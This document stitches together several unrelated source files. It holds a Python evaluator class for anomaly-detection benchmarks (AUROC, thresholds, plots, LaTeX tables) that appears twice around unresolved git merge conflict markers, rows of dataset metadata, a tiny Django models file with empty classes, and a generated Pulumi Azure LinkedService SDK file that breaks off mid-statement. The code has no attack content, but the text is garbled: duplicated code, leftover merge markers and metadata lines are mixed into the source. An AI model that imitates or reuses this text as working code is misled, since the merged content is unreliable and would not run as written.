for other_evaluator in evaluators[1:]:
assert evaluator.detectors == other_evaluator.detectors, 'All evaluators should use the same detectors'
pivot_benchmarks = [ev.benchmark_results.pivot(index='dataset', columns='algorithm',
values='auroc') for ev in evaluators]
concat_benchmarks = pd.concat(pivot_benchmarks)
auroc_matrix = concat_benchmarks.groupby(['dataset']).mean()
datasets = [[evaluator.get_key_and_value(str(d)) for d in ev.index.values]
for ev in pivot_benchmarks]
datasets = [tuple(d) for d in np.concatenate(datasets)] # Required for MultiIndex.from_tuples
datasets = pd.MultiIndex.from_tuples(datasets, names=['Type', 'Level'])
auroc_matrix.index = datasets
return auroc_matrix
def get_multi_index_dataframe(self):
return Evaluator.to_multi_index_frame([self])
@staticmethod
def plot_heatmap(evaluators, store=True):
mi_df = Evaluator.to_multi_index_frame(evaluators)
detectors, datasets = mi_df.columns, mi_df.index
fig, ax = plt.subplots(figsize=(len(detectors) + 2, len(datasets)))
im = ax.imshow(mi_df, cmap=plt.get_cmap('YlOrRd'), vmin=0, vmax=1)
plt.colorbar(im)
# Show MultiIndex for ordinate
Evaluator.insert_multi_index_yaxis(ax, mi_df)
# Rotate the tick labels and set their alignment.
ax.set_xticks(np.arange(len(detectors)))
ax.set_xticklabels(detectors)
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode='anchor')
# Loop over data dimensions and create text annotations.
for i in range(len(detectors)):
for j in range(len(datasets)):
ax.text(i, j, f'{mi_df.iloc[j, i]:.2f}', ha='center', va='center', color='w',
path_effects=[path_effects.withSimplePatchShadow(
offset=(1, -1), shadow_rgbFace='b', alpha=0.9)])
ax.set_title('AUROC over all datasets and detectors')
# Prevent bug where x axis ticks are completely outside of bounds (matplotlib/issues/5456)
if len(datasets) > 2:
fig.tight_layout()
if store:
evaluators[0].store(fig, 'heatmap', no_counters=True, store_in_figures=True)
return fig
def plot_single_heatmap(self, store=True):
Evaluator.plot_heatmap([self], store)
@staticmethod
def get_printable_runs_results(results):
print_order = ['dataset', 'algorithm', 'accuracy', 'precision', 'recall', 'F1-score', 'F0.1-score', 'auroc']
rename_columns = [col for col in print_order if col not in ['dataset', 'algorithm']]
# calc std and mean for each algorithm per dataset
std_results = results.groupby(['dataset', 'algorithm']).std(ddof=0).fillna(0)
# get rid of multi-index
std_results = std_results.reset_index()
std_results = std_results[print_order]
std_results.rename(inplace=True, index=str,
columns=dict([(old_col, old_col + '_std') for old_col in rename_columns]))
avg_results = results.groupby(['dataset', 'algorithm'], as_index=False).mean()
avg_results = avg_results[print_order]
avg_results_renamed = avg_results.rename(
index=str, columns=dict([(old_col, old_col + '_avg') for old_col in rename_columns]))
return std_results, avg_results, avg_results_renamed
def gen_merged_tables(self, results, title_suffix=None, store=True):
title_suffix = f'_{title_suffix}' if title_suffix else ''
std_results, avg_results, avg_results_renamed = Evaluator.get_printable_runs_results(results)
ds_title_suffix = f'per_dataset{title_suffix}'
self.print_merged_table_per_dataset(std_results)
self.gen_merged_latex_per_dataset(std_results, f'std_{ds_title_suffix}', store=store)
self.print_merged_table_per_dataset(avg_results_renamed)
self.gen_merged_latex_per_dataset(avg_results_renamed, f'avg_{ds_title_suffix}', store=store)
det_title_suffix = f'per_algorithm{title_suffix}'
self.print_merged_table_per_algorithm(std_results)
self.gen_merged_latex_per_algorithm(std_results, f'std_{det_title_suffix}', store=store)
self.print_merged_table_per_algorithm(avg_results_renamed)
self.gen_merged_latex_per_algorithm(avg_results_renamed, f'avg_{det_title_suffix}', store=store)
def binarize(self, score, threshold=None):
threshold = threshold if threshold is not None else self.threshold(score)
score = np.where(np.isnan(score), np.nanmin(score) - sys.float_info.epsilon, score)
return np.where(score >= threshold, 1, 0)
def threshold(self, score):
return np.nanmean(score) + 2 * np.nanstd(score)
=======
import gc
import logging
import os
import pickle
import re
import sys
import traceback
from textwrap import wrap
import matplotlib.pyplot as plt
import matplotlib.patheffects as path_effects
from matplotlib.font_manager import FontProperties
import numpy as np
import pandas as pd
import progressbar
import time
from sklearn.metrics import accuracy_score, fbeta_score
from sklearn.metrics import precision_recall_fscore_support as prf
from sklearn.metrics import roc_curve, auc
from tabulate import tabulate
from .config import init_logging
class Evaluator:
def __init__(self, datasets: list, detectors: callable, output_dir: {str} = None, seed: int = None,
create_log_file=True):
"""
:param datasets: list of datasets
:param detectors: callable that returns list of detectors
"""
assert np.unique([x.name for x in datasets]).size == len(datasets), 'Some datasets have the same name!'
self.datasets = datasets
self._detectors = detectors
self.output_dir = output_dir or 'reports'
self.results = dict()
if create_log_file:
init_logging(os.path.join(self.output_dir, 'logs'))
self.logger = logging.getLogger(__name__)
# Dirty hack: Is set by the main.py to insert results from multiple evaluator runs
self.benchmark_results = None
# Last passed seed value in evaluate()
self.seed = seed
@property
def detectors(self):
detectors = self._detectors(self.seed)
assert np.unique([x.name for x in detectors]).size == len(detectors), 'Some detectors have the same name!'
return detectors
def set_benchmark_results(self, benchmark_result):
self.benchmark_results = benchmark_result
def export_results(self, name):
output_dir = os.path.join(self.output_dir, 'evaluators')
os.makedirs(output_dir, exist_ok=True)
timestamp = time.strftime('%Y-%m-%d-%H%M%S')
path = os.path.join(output_dir, f'{name}-{timestamp}.pkl')
self.logger.info(f'Store evaluator results at {os.path.abspath(path)}')
save_dict = {
'datasets': [x.name for x in self.datasets],
'detectors': [x.name for x in self.detectors],
'benchmark_results': self.benchmark_results,
'results': self.results,
'output_dir': self.output_dir,
'seed': int(self.seed),
}
with open(path, 'wb') as f:
pickle.dump(save_dict, f)
return path
# Import benchmark_results if this evaluator uses the same detectors and datasets
# self.results are not available because they are overwritten by each run
def import_results(self, name):
output_dir = os.path.join(self.output_dir, 'evaluators')
path = os.path.join(output_dir, f'{name}.pkl')
self.logger.info(f'Read evaluator results at {os.path.abspath(path)}')
with open(path, 'rb') as f:
save_dict = pickle.load(f)
self.logger.debug(f'Importing detectors {"; ".join(save_dict["detectors"])}')
my_detectors = [x.name for x in self.detectors]
assert np.array_equal(save_dict['detectors'], my_detectors), 'Detectors should be the same'
self.logger.debug(f'Importing datasets {"; ".join(save_dict["datasets"])}')
my_datasets = [x.name for x in self.datasets]
assert np.array_equal(save_dict['datasets'], my_datasets), 'Datasets should be the same'
self.benchmark_results = save_dict['benchmark_results']
self.seed = save_dict['seed']
self.results = save_dict['results']
@staticmethod
def get_accuracy_precision_recall_fscore(y_true: list, y_pred: list):
accuracy = accuracy_score(y_true, y_pred)
# warn_for=() avoids log warnings for any result being zero
precision, recall, f_score, _ = prf(y_true, y_pred, average='binary', warn_for=())
if precision == 0 and recall == 0:
f01_score = 0
else:
f01_score = fbeta_score(y_true, y_pred, average='binary', beta=0.1)
return accuracy, precision, recall, f_score, f01_score
@staticmethod
def get_auroc(det, ds, score):
if np.isnan(score).all():
score = np.zeros_like(score)
_, _, _, y_test = ds.data()
score_nonan = score.copy()
# Rank NaN below every other value in terms of anomaly score
score_nonan[np.isnan(score_nonan)] = np.nanmin(score_nonan) - sys.float_info.epsilon
fpr, tpr, _ = roc_curve(y_test, score_nonan)
return auc(fpr, tpr)
def get_optimal_threshold(self, det, y_test, score, steps=100, return_metrics=False):
maximum = np.nanmax(score)
minimum = np.nanmin(score)
threshold = np.linspace(minimum, maximum, steps)
metrics = list(self.get_metrics_by_thresholds(y_test, score, threshold))
metrics = np.array(metrics).T
anomalies, acc, prec, rec, f_score, f01_score = metrics
if return_metrics:
return anomalies, acc, prec, rec, f_score, f01_score, threshold
else:
return threshold[np.argmax(f_score)]
def evaluate(self):
for ds in progressbar.progressbar(self.datasets):
(X_train, y_train, X_test, y_test) = ds.data()
for det in progressbar.progressbar(self.detectors):
self.logger.info(f'Training {det.name} on {ds.name} with seed {self.seed}')
try:
det.fit(X_train.copy())
score = det.predict(X_test.copy())
self.results[(ds.name, det.name)] = score
try:
self.plot_details(det, ds, score)
except Exception:
pass
except Exception as e:
self.logger.error(f'An exception occurred while training {det.name} on {ds}: {e}')
self.logger.error(traceback.format_exc())
self.results[(ds.name, det.name)] = np.zeros_like(y_test)
gc.collect()
def benchmarks(self) -> pd.DataFrame:
df = pd.DataFrame()
for ds in self.datasets:
_, _, _, y_test = ds.data()
for det in self.detectors:
score = self.results[(ds.name, det.name)]
y_pred = self.binarize(score, self.get_optimal_threshold(det, y_test, np.array(score)))
acc, prec, rec, f1_score, f01_score = self.get_accuracy_precision_recall_fscore(y_test, y_pred)
score = self.results[(ds.name, det.name)]
auroc = self.get_auroc(det, ds, score)
df = df.append({'dataset': ds.name,
'algorithm': det.name,
'accuracy': acc,
'precision': prec,
'recall': rec,
'F1-score': f1_score,
'F0.1-score': f01_score,
'auroc': auroc},
ignore_index=True)
return df
def get_metrics_by_thresholds(self, y_test: list, score: list, thresholds: list):
for threshold in thresholds:
anomaly = self.binarize(score, threshold=threshold)
metrics = Evaluator.get_accuracy_precision_recall_fscore(y_test, anomaly)
yield (anomaly.sum(), *metrics)
def plot_scores(self, store=True):
detectors = self.detectors
plt.close('all')
figures = []
for ds in self.datasets:
X_train, y_train, X_test, y_test = ds.data()
subtitle_loc = 'left'
fig = plt.figure(figsize=(15, 15))
fig.canvas.set_window_title(ds.name)
sp = fig.add_subplot((2 * len(detectors) + 3), 1, 1)
sp.set_title('original training data', loc=subtitle_loc)
for col in X_train.columns:
plt.plot(X_train[col])
sp = fig.add_subplot((2 * len(detectors) + 3), 1, 2)
sp.set_title('original test set', loc=subtitle_loc)
for col in X_test.columns:
plt.plot(X_test[col])
sp = fig.add_subplot((2 * len(detectors) + 3), 1, 3)
sp.set_title('binary labels of test set', loc=subtitle_loc)
plt.plot(y_test)
subplot_num = 4
for det in detectors:
sp = fig.add_subplot((2 * len(detectors) + 3), 1, subplot_num)
sp.set_title(f'scores of {det.name}', loc=subtitle_loc)
score = self.results[(ds.name, det.name)]
plt.plot(np.arange(len(score)), [x for x in score])
threshold_line = len(score) * [self.get_optimal_threshold(det, y_test, np.array(score))]
plt.plot([x for x in threshold_line])
subplot_num += 1
sp = fig.add_subplot((2 * len(detectors) + 3), 1, subplot_num)
sp.set_title(f'binary labels of {det.name}', loc=subtitle_loc)
plt.plot(np.arange(len(score)),
[x for x in self.binarize(score, self.get_optimal_threshold(det, y_test, np.array(score)))])
subplot_num += 1
fig.subplots_adjust(top=0.9, hspace=0.4)
fig.tight_layout()
if store:
self.store(fig, f'scores_{ds.name}')
figures.append(fig)
return figures
def plot_threshold_comparison(self, steps=40, store=True):
detectors = self.detectors
plt.close('all')
plots_shape = len(detectors), len(self.datasets)
fig, axes = plt.subplots(*plots_shape, figsize=(len(detectors) * 15, len(self.datasets) * 5))
# Ensure two dimensions for iteration
axes = np.array(axes).reshape(*plots_shape).T
plt.suptitle('Compare thresholds', fontsize=10)
for ds, axes_row in zip(self.datasets, axes):
_, _, X_test, y_test = ds.data()
for det, ax in zip(detectors, axes_row):
score = np.array(self.results[(ds.name, det.name)])
anomalies, _, prec, rec, f_score, f01_score, thresh = self.get_optimal_threshold(
det, y_test, score, return_metrics=True)
ax.plot(thresh, anomalies / len(y_test),
label=fr'anomalies ({len(y_test)} $\rightarrow$ 1)')
ax.plot(thresh, prec, label='precision')
ax.plot(thresh, rec, label='recall')
ax.plot(thresh, f_score, label='f_score', linestyle='dashed')
ax.plot(thresh, f01_score, label='f01_score', linestyle='dashed')
ax.set_title(f'{det.name} on {ds.name}')
ax.set_xlabel('Threshold')
ax.legend()
# Avoid overlapping title and axis labels
plt.xlim([0.0, 1.0])
fig.subplots_adjust(top=0.9, hspace=0.4, right=1, left=0)
fig.tight_layout()
if store:
self.store(fig, 'metrics_by_thresholds')
return fig
def plot_roc_curves(self, store=True):
detectors = self.detectors
plt.close('all')
figures = []
for ds in self.datasets:
_, _, _, y_test = ds.data()
fig_scale = 3
fig = plt.figure(figsize=(fig_scale * len(detectors), fig_scale))
fig.canvas.set_window_title(ds.name + ' ROC')
fig.suptitle(f'ROC curve on {ds.name}', fontsize=14, y='1.1')
subplot_count = 1
for det in detectors:
self.logger.info(f'Plotting ROC curve for {det.name} on {ds.name}')
score = self.results[(ds.name, det.name)]
if np.isnan(score).all():
score = np.zeros_like(score)
# Rank NaN below every other value in terms of anomaly score
score[np.isnan(score)] = np.nanmin(score) - sys.float_info.epsilon
fpr, tpr, _ = roc_curve(y_test, score)
roc_auc = auc(fpr, tpr)
plt.subplot(1, len(detectors), subplot_count)
plt.plot(fpr, tpr, color='darkorange',
lw=2, label='area = %0.2f' % roc_auc)
subplot_count += 1
plt.plot([0, 1], [0, 1], color='navy', lw=2, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.gca().set_aspect('equal', adjustable='box')
plt.title('\n'.join(wrap(det.name, 20)))
plt.legend(loc='lower right')
plt.tight_layout()
if store:
self.store(fig, f'roc_{ds.name}')
figures.append(fig)
return figures
def plot_auroc(self, store=True, title='AUROC'):
plt.close('all')
self.benchmark_results[['dataset', 'algorithm', 'auroc']].pivot(
index='algorithm', columns='dataset', values='auroc').plot(kind='bar')
plt.legend(loc=3, framealpha=0.5)
plt.xticks(rotation=20)
plt.ylabel('AUC', rotation='horizontal', labelpad=20)
plt.title(title)
plt.ylim(ymin=0, ymax=1)
plt.tight_layout()
if store:
self.store(plt.gcf(), 'auroc', store_in_figures=True)
def plot_details(self, det, ds, score, store=True):
if not det.details:
return
plt.close('all')
cmap = plt.get_cmap('inferno')
_, _, X_test, y_test = ds.data()
grid = 0
for value in det.prediction_details.values():
grid += 1 if value.ndim == 1 else value.shape[0]
grid += X_test.shape[1] # data
grid += 1 + 1 # score and gt
fig, axes = plt.subplots(grid, 1, figsize=(15, 1.5 * grid))
i = 0
c = cmap(i / grid)
axes[i].set_title('test data')
for col in X_test.values.T:
axes[i].plot(col, color=c)
i += 1
c = cmap(i / grid)
axes[i].set_title('test gt data')
axes[i].plot(y_test.values, color=c)
i += 1
c = cmap(i / grid)
axes[i].set_title('scores')
axes[i].plot(score, color=c)
i += 1
c = cmap(i / grid)
for key, values in det.prediction_details.items():
axes[i].set_title(key)
if values.ndim == 1:
axes[i].plot(values, color=c)
i += 1
elif values.ndim == 2:
for v in values:
axes[i].plot(v, color=c)
i += 1
else:
self.logger.warning('plot_details: not sure what to do')
c = cmap(i / grid)
fig.tight_layout()
if store:
self.store(fig, f'details_{det.name}_{ds.name}')
return fig
# create boxplot diagrams for auc values for each algorithm/dataset per algorithm/dataset
def create_boxplots(self, runs, data, detectorwise=True, store=True):
target = 'algorithm' if detectorwise else 'dataset'
grouped_by = 'dataset' if detectorwise else 'algorithm'
relevant_results = data[['algorithm', 'dataset', 'auroc']]
figures = []
for det_or_ds in (self.detectors if detectorwise else self.datasets):
relevant_results[relevant_results[target] == det_or_ds.name].boxplot(by=grouped_by, figsize=(15, 15))
plt.suptitle('') # boxplot() adds a suptitle
plt.title(f'AUC grouped by {grouped_by} for {det_or_ds.name} over {runs} runs')
plt.ylim(ymin=0, ymax=1)
plt.tight_layout()
figures.append(plt.gcf())
if store:
self.store(plt.gcf(), f'boxplot_auc_for_{det_or_ds.name}_{runs}_runs', store_in_figures=True)
return figures
# create bar charts for averaged pipeline results per algorithm/dataset
def create_bar_charts(self, runs, detectorwise=True, store=True):
target = 'algorithm' if detectorwise else 'dataset'
grouped_by = 'dataset' if detectorwise else 'algorithm'
relevant_results = self.benchmark_results[['algorithm', 'dataset', 'auroc']]
figures = []
for det_or_ds in (self.detectors if detectorwise else self.datasets):
relevant_results[relevant_results[target] == det_or_ds.name].plot(x=grouped_by, kind='bar', figsize=(7, 7))
plt.suptitle('') # boxplot() adds a suptitle
plt.title(f'AUC for {target} {det_or_ds.name} over {runs} runs')
plt.ylim(ymin=0, ymax=1)
plt.tight_layout()
figures.append(plt.gcf())
if store:
self.store(plt.gcf(), f'barchart_auc_for_{det_or_ds.name}_{runs}_runs', store_in_figures=True)
return figures
def store(self, fig, title, extension='pdf', no_counters=False, store_in_figures=False):
timestamp = time.strftime('%Y-%m-%d-%H%M%S')
if store_in_figures:
output_dir = os.path.join(self.output_dir, 'figures')
else:
output_dir = os.path.join(self.output_dir, 'figures', f'seed-{self.seed}')
os.makedirs(output_dir, exist_ok=True)
counters_str = '' if no_counters else f'-{len(self.detectors)}-{len(self.datasets)}'
path = os.path.join(output_dir, f'{title}{counters_str}-{timestamp}.{extension}')
fig.savefig(path)
self.logger.info(f'Stored plot at {path}')
def store_text(self, content, title, extension='txt'):
timestamp = int(time.time())
output_dir = os.path.join(self.output_dir, 'tables', f'seed-{self.seed}')
path = os.path.join(output_dir, f'{title}-{len(self.detectors)}-{len(self.datasets)}-{timestamp}.{extension}')
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path, 'w') as f:
f.write(content)
self.logger.info(f'Stored {extension} file at {path}')
def print_merged_table_per_dataset(self, results):
for ds in self.datasets:
table = tabulate(results[results['dataset'] == ds.name], headers='keys', tablefmt='psql')
self.logger.info(f'Dataset: {ds.name}\n{table}')
def gen_merged_latex_per_dataset(self, results, title_suffix=None, store=True):
title = f'latex_merged{f"_{title_suffix}" if title_suffix else ""}'
content = ''
for ds in self.datasets:
content += f'''{ds.name}:\n\n{tabulate(results[results['dataset'] == ds.name],
headers='keys', tablefmt='latex')}\n\n'''
if store:
self.store_text(content=content, title=title, extension='tex')
return content
def print_merged_table_per_algorithm(self, results):
for det in self.detectors:
table = tabulate(results[results['algorithm'] == det.name], headers='keys', tablefmt='psql')
self.logger.info(f'Detector: {det.name}\n{table}')
def gen_merged_latex_per_algorithm(self, results, title_suffix=None, store=True):
title = f'latex_merged{f"_{title_suffix}" if title_suffix else ""}'
content = ''
for det in self.detectors:
content += f'''{det.name}:\n\n{tabulate(results[results['algorithm'] == det.name],
headers='keys', tablefmt='latex')}\n\n'''
if store:
self.store_text(content=content, title=title, extension='tex')
return content
@staticmethod
def translate_var_key(key_name):
if key_name == 'pol':
return 'Pollution'
if key_name == 'mis':
return 'Missing'
if key_name == 'extremeness':
return 'Extremeness'
if key_name == 'f':
return 'Multivariate'
# self.logger('Unexpected dataset name (unknown variable in name)')
return None
@staticmethod
def get_key_and_value(dataset_name):
# Extract var name and value from dataset name
var_re = re.compile(r'.+\((\w*)=(.*)\)')
# e.g. 'Syn Extreme Outliers (pol=0.1)'
match = var_re.search(dataset_name)
if not match:
# self.logger.warn('Unexpected dataset name (not variable in name)')
return '-', dataset_name
var_key = match.group(1)
var_value = match.group(2)
return Evaluator.translate_var_key(var_key), var_value
@staticmethod
def get_dataset_types(mi_df):
types = mi_df.index.get_level_values('Type')
indexes = np.unique(types, return_index=True)[1]
return [types[index] for index in sorted(indexes)]
@staticmethod
def insert_multi_index_yaxis(ax, mi_df):
type_title_offset = -1.6 # depends on string length of xaxis ticklabels
datasets = mi_df.index
dataset_types = Evaluator.get_dataset_types(mi_df) # Returns unique entries keeping original order
logging.getLogger(__name__).debug('Plotting heatmap for groups {" ".join(dataset_types)}')
ax.set_yticks(np.arange(len(datasets)))
ax.set_yticklabels([x[1] for x in datasets])
y_axis_title_pos = 0 # Store at which position we are for plotting the next title
for idx, dataset_type in enumerate(dataset_types):
section_frame = mi_df.iloc[mi_df.index.get_level_values('Type') == dataset_type]
# Somehow it's sorted by its occurence (which is what we want here)
dataset_levels = section_frame.index.remove_unused_levels().levels[1]
title_pos = y_axis_title_pos + 0.5 * (len(dataset_levels) - 1)
ax.text(type_title_offset, title_pos, dataset_type, ha='center', va='center', rotation=90,
fontproperties=FontProperties(weight='bold'))
if idx < len(dataset_types) - 1:
sep_pos = y_axis_title_pos + (len(dataset_levels) - 0.6)
ax.text(-0.5, sep_pos, '_' * int(type_title_offset * -10), ha='right', va='center')
y_axis_title_pos += len(dataset_levels)
@staticmethod
def to_multi_index_frame(evaluators):
evaluator = evaluators[0]
for other_evaluator in evaluators[1:]:
assert evaluator.detectors == other_evaluator.detectors, 'All evaluators should use the same detectors'
pivot_benchmarks = [ev.benchmark_results.pivot(index='dataset', columns='algorithm',
values='auroc') for ev in evaluators]
concat_benchmarks = pd.concat(pivot_benchmarks)
auroc_matrix = concat_benchmarks.groupby(['dataset']).mean()
datasets = [[evaluator.get_key_and_value(str(d)) for d in ev.index.values]
for ev in pivot_benchmarks]
datasets = [tuple(d) for d in np.concatenate(datasets)] # Required for MultiIndex.from_tuples
datasets = pd.MultiIndex.from_tuples(datasets, names=['Type', 'Level'])
auroc_matrix.index = datasets
return auroc_matrix
def get_multi_index_dataframe(self):
return Evaluator.to_multi_index_frame([self])
@staticmethod
def plot_heatmap(evaluators, store=True):
mi_df = Evaluator.to_multi_index_frame(evaluators)
detectors, datasets = mi_df.columns, mi_df.index
fig, ax = plt.subplots(figsize=(len(detectors) + 2, len(datasets)))
im = ax.imshow(mi_df, cmap=plt.get_cmap('YlOrRd'), vmin=0, vmax=1)
plt.colorbar(im)
# Show MultiIndex for ordinate
Evaluator.insert_multi_index_yaxis(ax, mi_df)
# Rotate the tick labels and set their alignment.
ax.set_xticks(np.arange(len(detectors)))
ax.set_xticklabels(detectors)
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode='anchor')
# Loop over data dimensions and create text annotations.
for i in range(len(detectors)):
for j in range(len(datasets)):
ax.text(i, j, f'{mi_df.iloc[j, i]:.2f}', ha='center', va='center', color='w',
path_effects=[path_effects.withSimplePatchShadow(
offset=(1, -1), shadow_rgbFace='b', alpha=0.9)])
ax.set_title('AUROC over all datasets and detectors')
# Prevent bug where x axis ticks are completely outside of bounds (matplotlib/issues/5456)
if len(datasets) > 2:
fig.tight_layout()
if store:
evaluators[0].store(fig, 'heatmap', no_counters=True, store_in_figures=True)
return fig
def plot_single_heatmap(self, store=True):
Evaluator.plot_heatmap([self], store)
@staticmethod
def get_printable_runs_results(results):
print_order = ['dataset', 'algorithm', 'accuracy', 'precision', 'recall', 'F1-score', 'F0.1-score', 'auroc']
rename_columns = [col for col in print_order if col not in ['dataset', 'algorithm']]
# calc std and mean for each algorithm per dataset
std_results = results.groupby(['dataset', 'algorithm']).std(ddof=0).fillna(0)
# get rid of multi-index
std_results = std_results.reset_index()
std_results = std_results[print_order]
std_results.rename(inplace=True, index=str,
columns=dict([(old_col, old_col + '_std') for old_col in rename_columns]))
avg_results = results.groupby(['dataset', 'algorithm'], as_index=False).mean()
avg_results = avg_results[print_order]
avg_results_renamed = avg_results.rename(
index=str, columns=dict([(old_col, old_col + '_avg') for old_col in rename_columns]))
return std_results, avg_results, avg_results_renamed
def gen_merged_tables(self, results, title_suffix=None, store=True):
title_suffix = f'_{title_suffix}' if title_suffix else ''
std_results, avg_results, avg_results_renamed = Evaluator.get_printable_runs_results(results)
ds_title_suffix = f'per_dataset{title_suffix}'
self.print_merged_table_per_dataset(std_results)
self.gen_merged_latex_per_dataset(std_results, f'std_{ds_title_suffix}', store=store)
self.print_merged_table_per_dataset(avg_results_renamed)
self.gen_merged_latex_per_dataset(avg_results_renamed, f'avg_{ds_title_suffix}', store=store)
det_title_suffix = f'per_algorithm{title_suffix}'
self.print_merged_table_per_algorithm(std_results)
self.gen_merged_latex_per_algorithm(std_results, f'std_{det_title_suffix}', store=store)
self.print_merged_table_per_algorithm(avg_results_renamed)
self.gen_merged_latex_per_algorithm(avg_results_renamed, f'avg_{det_title_suffix}', store=store)
def binarize(self, score, threshold=None):
threshold = threshold if threshold is not None else self.threshold(score)
score = np.where(np.isnan(score), np.nanmin(score) - sys.float_info.epsilon, score)
return np.where(score >= threshold, 1, 0)
def threshold(self, score):
return np.nanmean(score) + 2 * np.nanstd(score)
>>>>>>> upstream/master
| 45.920569
| 120
| 0.597003
| 7,057
| 54,921
| 4.468471
| 0.074536
| 0.010275
| 0.003805
| 0.009133
| 0.999429
| 0.999429
| 0.999429
| 0.999429
| 0.999429
| 0.999429
| 0
| 0.009893
| 0.28592
| 54,921
| 1,195
| 121
| 45.958996
| 0.794176
| 0.055006
| 0
| 0.994975
| 0
| 0.00402
| 0.119693
| 0.031296
| 0
| 0
| 0
| 0
| 0.01005
| 0
| null | null | 0.00201
| 0.046231
| null | null | 0.024121
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0736d4d113f112a1fe5974c6d2a7f844c8f407d2
| 160
|
py
|
Python
|
apps/store/models.py
|
jakejie/ShopPro
|
f0cec134ae77f4449f15a0219123d6a6bce2aad2
|
[
"Apache-2.0"
] | 1
|
2019-04-20T16:58:02.000Z
|
2019-04-20T16:58:02.000Z
|
apps/store/models.py
|
jakejie/ShopPro
|
f0cec134ae77f4449f15a0219123d6a6bce2aad2
|
[
"Apache-2.0"
] | 6
|
2020-06-05T19:57:58.000Z
|
2021-09-08T00:49:17.000Z
|
apps/store/models.py
|
jakejie/ShopPro
|
f0cec134ae77f4449f15a0219123d6a6bce2aad2
|
[
"Apache-2.0"
] | 1
|
2021-09-10T18:29:28.000Z
|
2021-09-10T18:29:28.000Z
|
from django.db import models
class StoreManage(models.Model):
pass
class StoreCategory(models.Model):
pass
class Activate(models.Model):
pass
| 11.428571
| 34
| 0.725
| 20
| 160
| 5.8
| 0.55
| 0.284483
| 0.387931
| 0.344828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.19375
| 160
| 13
| 35
| 12.307692
| 0.899225
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.428571
| 0.142857
| 0
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
076873caae99de202f9a8eeccf536a330dc8f471
| 33,739
|
py
|
Python
|
sdk/python/pulumi_azure/loganalytics/linked_service.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/loganalytics/linked_service.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/loganalytics/linked_service.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['LinkedServiceArgs', 'LinkedService']
@pulumi.input_type
class LinkedServiceArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
linked_service_name: Optional[pulumi.Input[str]] = None,
read_access_id: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workspace_id: Optional[pulumi.Input[str]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
write_access_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a LinkedService resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Log Analytics Linked Service is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] linked_service_name: Name of the type of linkedServices resource to connect to the Log Analytics Workspace specified in workspace_name. Accepted values are `automation` and `cluster`. Defaults to `automation`. Changing this forces a new resource to be created.
:param pulumi.Input[str] read_access_id: The ID of the readable Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
:param pulumi.Input[str] resource_id: The ID of the Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] workspace_id: The ID of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
:param pulumi.Input[str] workspace_name: The name of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
:param pulumi.Input[str] write_access_id: The ID of the writable Resource that will be linked to the workspace. This should be used for linking to a Log Analytics Cluster resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if linked_service_name is not None:
warnings.warn("""This field has been deprecated and will be removed in a future version of the provider""", DeprecationWarning)
pulumi.log.warn("""linked_service_name is deprecated: This field has been deprecated and will be removed in a future version of the provider""")
if linked_service_name is not None:
pulumi.set(__self__, "linked_service_name", linked_service_name)
if read_access_id is not None:
pulumi.set(__self__, "read_access_id", read_access_id)
if resource_id is not None:
warnings.warn("""This field has been deprecated in favour of `read_access_id` and will be removed in a future version of the provider""", DeprecationWarning)
pulumi.log.warn("""resource_id is deprecated: This field has been deprecated in favour of `read_access_id` and will be removed in a future version of the provider""")
if resource_id is not None:
pulumi.set(__self__, "resource_id", resource_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if workspace_id is not None:
pulumi.set(__self__, "workspace_id", workspace_id)
if workspace_name is not None:
